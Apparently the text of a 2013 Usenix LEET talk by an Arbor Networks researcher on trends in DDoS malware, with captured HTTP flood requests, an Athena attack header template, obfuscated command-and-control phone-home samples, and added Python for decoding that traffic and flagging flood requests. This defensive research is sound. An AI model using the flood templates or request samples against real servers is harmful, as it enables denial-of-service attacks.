Advancements in DDoS Malware
Recent Advancements in DDoS Malware
Jason Jones
Usenix LEET13
Agenda
• Who am I?
• Why?
• What Hasn’t Changed
• What Has Changed
  – Better Blending In & Hiding
  – Better Botnet Building
  – Better Protection
• Trends and Takeaways

Who am I?
• Jason Jones
  – Security Research Analyst on Arbor Networks’ ASERT
  – Presented at
    • BlackHat USA 2012
    • InfoSec Southwest 2013
  – Research interests
    • IP reputation
    • Malware clustering
    • Data mining
    • Graph Theory / Combinatorics

ASERT Malware Corral
• Arbor Security Engineering & Response Team
• ASERT Malware Corral
  – Malware storage + processing system
  – Processing occurs via sandbox, static methods
  – Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples / day
• 567 unique family names tagged last year
  – Includes DDoS, Bankers, Infostealers, APT, etc.

Why?
• DDoS Becoming More of a Threat
  – SpamHaus
  – “Triple Crown”
  – Political Motivations
  – Anon Ops
  – Ransom
• DDoS-specific Malware Evolving In Response to Our Response

What Hasn’t Changed

Still the same…
• Most Malware Include
  – Basic GET/POST Flood
  – SYN and/or Connection Flood
  – UDP Flood
• Lots of IRC CnC Still Around
• Many use hard-coded set of user-agents
• Still broken
  – Slowloris
  – ARME

Still the same… (cont.)
• .NET malware is still terrible
  – Most decompiles fine in .NET Reflector
  – Use .NET HTTP methods
  – Looks mostly the same for DDoS
• Gh0st RAT variants still popular
• Most are not fully protocol aware
• Many don’t do SSL / HTTPS
• Copy + Paste still prevalent

What Has Changed

Better Blending In & Hiding on the Network
• HTTP CnC has always been popular
  – Tended to be plaintext
  – Athena recently moved from IRC -> HTTP
• Obfuscates commands
• Example:
  – a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D
  – b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D
  – c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex
  – Betabot employs encryption on phone-home
• Adjustable phone-home intervals
  – Specify long intervals to avoid suspicion
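The a=/b= pair above can be unwound with the script below, an added example that is not part of the slides. The deck only says the commands are obfuscated; that a= is a percent-encoded base64 string holding two 26-letter alphabets, and that b= is base64 whose lowercase letters were substituted through them, is an inference from this one sample (the result has the |type:…|uid:…| layout the phone-home slide later in the deck shows in the clear), not a statement from the deck.

```python
import base64
from string import ascii_lowercase
from urllib.parse import unquote

# The a= and b= form fields exactly as they appear on the slide (copied, not constructed).
SAMPLE_A = ("%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78"
            "%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69"
            "%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D")
SAMPLE_B = ("wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0"
            "wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2"
            "MS4rLkN8dtV0OkQlMHr%3D")


def parse_key(a_param):
    """a= is percent-encoded base64 of 'plainalphabet:cipheralphabet' (inferred, not documented)."""
    plain, cipher = base64.b64decode(unquote(a_param)).decode("ascii").split(":")
    if sorted(plain) != list(ascii_lowercase) or sorted(cipher) != list(ascii_lowercase):
        raise ValueError("a= does not carry two full lowercase alphabets")
    return plain, cipher


def decode_payload(a_param, b_param):
    """Undo the lowercase substitution on b=, then base64-decode what is left."""
    plain, cipher = parse_key(a_param)
    unsub = str.maketrans(cipher, plain)      # cipher letter -> original base64 letter
    b64 = unquote(b_param).translate(unsub)   # upper case, digits, '+', '/' and '=' untouched
    return base64.b64decode(b64).decode("ascii", errors="replace")


def fields(payload):
    """Split the '|key:value|...' record into a dict for logging or detection rules."""
    out = {}
    for item in payload.strip("|").split("|"):
        key, _, value = item.partition(":")
        out[key] = value
    return out


if __name__ == "__main__":
    record = decode_payload(SAMPLE_A, SAMPLE_B)
    print(record)
    print(fields(record))
```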

Better Blending In & Hiding on the Network (cont.)
• More Intelligent HTTP Attacks
  – Requests look more legitimate now
    • Drive uses randomization in UA’s
    • Athena uses long list of legitimate UA’s
  – More dynamic headers
    • Paradise borrowed from Armageddon2
  – Ability to specify POST parameters
    • Target search boxes, login forms, etc.
    • Use up DB queries, server processing
    • Randomized per request, avoid caching

Example – DirtJumper Drive POST Attack
POST /test HTTP/1.1
Host: 192.168.56.1:10000
User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://192.168.56.1:10000/
Content-Length: 2443
Content-Type: application/x-www-form-urlencoded

login=…&.........
login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]

Example – BlackRev
GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset:\twindows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie:\tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Athena IRC + HTTP: HTTP Attack (request template; “!” separates header lines, “|” separates the alternatives the bot picks from)
GET|POST|HEAD /<params> HTTP/1.1!Host: <target>!Range: bytes= <range bytes string>!Connection: Keep-alive | close!
User-Agent: ObtainUserAgentString()!Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public |private | max-stale!
Vary: * | User-Agent!Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c |text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8!
Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1!Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip!
Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en!Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif!
Content-Length: <length> !X-a: b!
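As an added example (not from the deck): a small checker that flags traits the template above can emit but a browser never sends. The two sample requests are constructed, and the rules are this example's own heuristics, drawn from the template and from RFC 7234 (public and private are response-only Cache-Control directives; Vary is a response header), not an Arbor signature.

```python
RESPONSE_ONLY_CACHE_DIRECTIVES = {"public", "private"}   # never valid in a request (RFC 7234)

ATHENA_LIKE = (  # constructed from the template: Range, Vary, odd Cache-Control, X-a: b
    "GET /index.php?q=1 HTTP/1.1\r\nHost: target.invalid\r\nRange: bytes=0-1023\r\n"
    "Connection: Keep-alive\r\nUser-Agent: Mozilla/5.0 (constructed)\r\n"
    "Cache-Control: max-stale, public\r\nVary: User-Agent\r\nAccept: */*\r\n"
    "Accept-Charset: *\r\nAccept-Encoding: compress, gzip\r\nAccept-Language: es\r\n"
    "Content-Type: image/gif\r\nContent-Length: 0\r\nX-a: b\r\n\r\n")
BROWSER_LIKE = (  # constructed ordinary browser GET for comparison
    "GET /index.html HTTP/1.1\r\nHost: target.invalid\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (constructed)\r\nAccept: text/html,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip,deflate\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n")


def parse_request(raw):
    """Return (method, {lowercased header name: value}) for a raw HTTP/1.1 request."""
    lines = raw.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers


def athena_indicators(raw):
    """List the template-only traits present; an empty list means nothing odd was seen."""
    method, h = parse_request(raw)
    hits = []
    if "vary" in h:             # Vary is a response header; no client sends it
        hits.append("Vary header in a request")
    directives = {d.strip().split("=", 1)[0].lower()
                  for d in h.get("cache-control", "").split(",") if d.strip()}
    if directives & RESPONSE_ONLY_CACHE_DIRECTIVES:
        hits.append("response-only Cache-Control directive")
    if method in ("GET", "HEAD") and "content-type" in h:
        hits.append("Content-Type on a body-less method")   # weaker signal on its own
    if h.get("x-a") == "b":     # literal trailing header from the template
        hits.append("X-a: b trailer")
    return hits


if __name__ == "__main__":
    print(athena_indicators(ATHENA_LIKE))
    print(athena_indicators(BROWSER_LIKE))
```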

Example – Athena HTTP Phone Home
POST /gate.php HTTP/1.1
Host: panel-gc.co.uk:69
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727)
Content-Length: 436

a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b%63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b%61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c=%31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a%77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOmM3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8
• |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP|ver:v1.0.3|net:4.0|
• |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|

Example – Paradise
status=headers
application/xml, image/png, text/html */*, text/html, text/html, application/xml text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c
x-gzip, identity x-compress, x-zip, sdch x-compress ,deflate, gzip, x-gzip
us-ua;q=0.5 az-us;q=0.9
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
http://www.snpp.com/
http://ask.fm/FlOoRNOoBlE
http://www.thesimpsons.com/
http://mylarha.deviantart.com/
http://www.thesimpsonslatino.com/

Building Better Botnets
• Use What’s Readily Available
  – “Triple Crown” financial attacks
    • Tiered CnC Structure
    • Dynamically update code with new attacks
    • Can easily adjust attacks if current attack is unsuccessful
  – SpamHaus DNS Amplification
    • Open resolvers
    • Not botnet per se, but…
    • Highly successful

Better Protections
• Store attacks in external DLL
  – Paradise: pulled down by main EXE
  – DLL is crypted
• Restrict bots to geo regions
  – Also blackholing connections
• Drop other malware on the same machine
• Previously mentioned obfuscating / encrypting phone-home
• More malware using encryption internal to binary
• More packers / obfuscations used

Better Protections (cont.)
• More Junk Code
• New Drive variant discards old phone home
  – 2-stage phone home
  – Base64 + underlying protection
  – 3 new attacks
  – Can now specify hard-coded or random Cookie vals
  – Still reversing….
  – Blog soon?

Trends and Takeaways

Trends and Takeaways
• DDoS becoming more of a feature of larger families
  – Still plenty of standalone, but becoming more common in other malware
• DNS amplification will likely make its way into malware soon
  – Too successful not to
  – Too easy not to
• More booter services popping up
  – Many Athena HTTP CnC hostnames appear to be booter backends
• Carberp source code leak will likely create a boom in Carberp variants similar to ZeuS

More Trends and Takeaways…
• Traditional botnets with DDoS addons don’t DDoS much
  – DarkComet
  – Some Athena HTTP used to mostly drop other malware
    • Nitol, Betabot, Andromeda, ZeuS
    • Appear to be botnet-for-hire types
• Still waiting for the first SPDY-aware malware
• Proper mobile DDoS botnet soon?

Questions/Comments/Feedback
• [email protected]
• @jasonljones

Thanks: Arbor/ASERT, Marc Eisenbarth, Alex Bardas
Thank You!